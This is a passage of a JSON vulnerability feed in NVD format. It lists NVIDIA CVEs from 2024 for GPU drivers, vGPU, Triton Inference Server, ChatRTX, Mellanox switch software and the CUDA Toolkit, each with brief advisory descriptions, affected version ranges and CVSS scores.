"availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-06-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0092", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Driver for Windows and Linux contains a vulnerability where an improper check or improper handling of exception conditions might lead to denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "470", "versionEndExcluding" : "475.06", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "535", "versionEndExcluding" : "538.67", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "550", "versionEndExcluding" : "552.55", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "555", "versionEndExcluding" : "555.99", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:geforce:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:nvs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:quadro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:rtx:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:studio:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:tesla:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:linux:*:*", "versionStartIncluding" : "470", "versionEndExcluding" : "470.256.02", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:linux:*:*", "versionStartIncluding" : "535", "versionEndExcluding" : "535.180.01", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:linux:*:*", "versionStartIncluding" : "550", "versionEndExcluding" : "550.90.07", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:linux:*:*", "versionStartIncluding" : "555", "versionEndExcluding" : "555.52.04", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:geforce:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:nvs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:quadro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:rtx:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:tesla:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "13.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "14.0", "versionEndExcluding" : "16.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.0", "versionEndExcluding" : "17.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:canonical:ubuntu_linux:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:citrix:hypervisor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cloud_gaming:*:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cloud_gaming:*:*:*:*:*:*:*:*", "versionEndExcluding" : "555.52.04", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "17.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:microsoft:azure_stack_hci:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-06-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0093", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU software for Linux contains a vulnerability where it can expose sensitive information to an actor that is not explicitly authorized to have access to that information. A successful exploit of this vulnerability might lead to information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "13.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "14.0", "versionEndExcluding" : "16.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.0", "versionEndExcluding" : "17.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:canonical:ubuntu_linux:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:citrix:hypervisor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cloud_gaming:*:*:*:*:*:*:*:*", "versionEndExcluding" : "555.52.04", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-06-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0094", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA vGPU software for Linux contains a vulnerability in the Virtual GPU Manager, where an untrusted guest VM can cause improper control of the interaction frequency in the host. A successful exploit of this vulnerability might lead to denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-06-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0095", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5546", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5546", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5546", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5546", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Triton Inference Server for Linux and Windows contains a vulnerability where a user can inject forged logs and executable commands by injecting arbitrary data as a new log entry. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-06-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0096", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5533", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5533", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5533", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5533", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA ChatRTX for Windows contains a vulnerability in Chat RTX UI, where a user can cause an improper privilege management issue by sending user inputs to change execution flow. A successful exploit of this vulnerability might lead to information disclosure, escalation of privileges, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-14T14:39Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0097", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5533", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5533", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5533", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5533", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA ChatRTX for Windows contains a vulnerability in ChatRTX UI, where a user can cause an improper privilege management issue by exploiting interprocess communication between different processes. A successful exploit of this vulnerability might lead to information disclosure, escalation of privileges, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-14T14:39Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0098", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5533", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5533", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5533", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5533", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA ChatRTX for Windows contains a vulnerability in the ChatRTX UI and backend, where a user can cause a clear-text transmission of sensitive information issue by data sniffing. A successful exploit of this vulnerability might lead to information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-14T14:39Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0099", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA vGPU software for Linux contains a vulnerability in the Virtual GPU Manager, where the guest OS could cause buffer overrun in the host. A successful exploit of this vulnerability might lead to information disclosure, data tampering, escalation of privileges, and denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-06-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0100", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5535", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5535", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5535", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5535", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Triton Inference Server for Linux contains a vulnerability in the tracing API, where a user can corrupt system files. A successful exploit of this vulnerability might lead to denial of service and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-14T14:39Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0101", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5559", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5559", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Mellanox OS, ONYX, Skyway, MetroX-2 and MetroX-3 XC contain a vulnerability in ipfilter, where improper ipfilter definitions could enable an attacker to cause a failure by attacking the switch. A successful exploit of this vulnerability might lead to denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-os:*:*:*:*:-:*:*:*", "versionEndExcluding" : "3.11.2002", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:tq8100-hs2f:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:tq8200-hs2f:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-gw:*:*:*:*:lts:*:*:*", "versionEndExcluding" : "8.1.4400", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-gw:*:*:*:*:-:*:*:*", "versionEndExcluding" : "8.2.2000", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:mga100-hs2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:onyx:*:*:*:*:lts:*:*:*", "versionEndExcluding" : "3.10.4402", "cpe_name" : [ ] } ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:nvda-os_xc:*:*:*:*:*:*:*:*", "versionEndExcluding" : "18.2.2000", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:mtq8400-hs2r:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-os:*:*:*:*:-:*:*:*", "versionEndExcluding" : "3.11.2002", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-08-08T17:15Z", "lastModifiedDate" : "2024-12-26T19:44Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0102", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-125" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5548", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5548", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA CUDA Toolkit for all platforms contains a vulnerability in nvdisasm, where an attacker can cause an out-of-bounds read issue by deceiving a user into reading a malformed ELF file. A successful exploit of this vulnerability might lead to denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cuda_toolkit:*:*:*:*:*:*:*:*", "versionEndExcluding" : "12.6.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-08-08T17:15Z", "lastModifiedDate" : "2024-09-16T19:37Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0103", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5546", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5546", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5546", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5546", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Triton Inference Server for Linux contains a vulnerability where a user may cause an incorrect Initialization of resource by network issue. A successful exploit of this vulnerability may lead to information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-06-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0104", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5559", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5559", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Mellanox OS, ONYX, Skyway, MetroX-2 and MetroX-3 XC contain a vulnerability in the LDAP AAA component, where a user can cause improper access. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and escalation of privileges." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:onyx:*:*:*:*:lts:*:*:*", "versionEndExcluding" : "3.10.4402", "cpe_name" : [ ] } ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-os:*:*:*:*:-:*:*:*", "versionEndExcluding" : "3.11.2002", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:tq8100-hs2f:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:tq8200-hs2f:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-gw:*:*:*:*:-:*:*:*", "versionEndExcluding" : "8.2.2000", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:mga100-hs2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:nvda-os_xc:*:*:*:*:*:*:*:*", "versionEndExcluding" : "18.2.2000", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:nvidia:mtq8400-hs2r:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:nvidia:mlnx-os:*:*:*:*:-:*:*:*", "versionEndExcluding" : "3.11.2202", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : 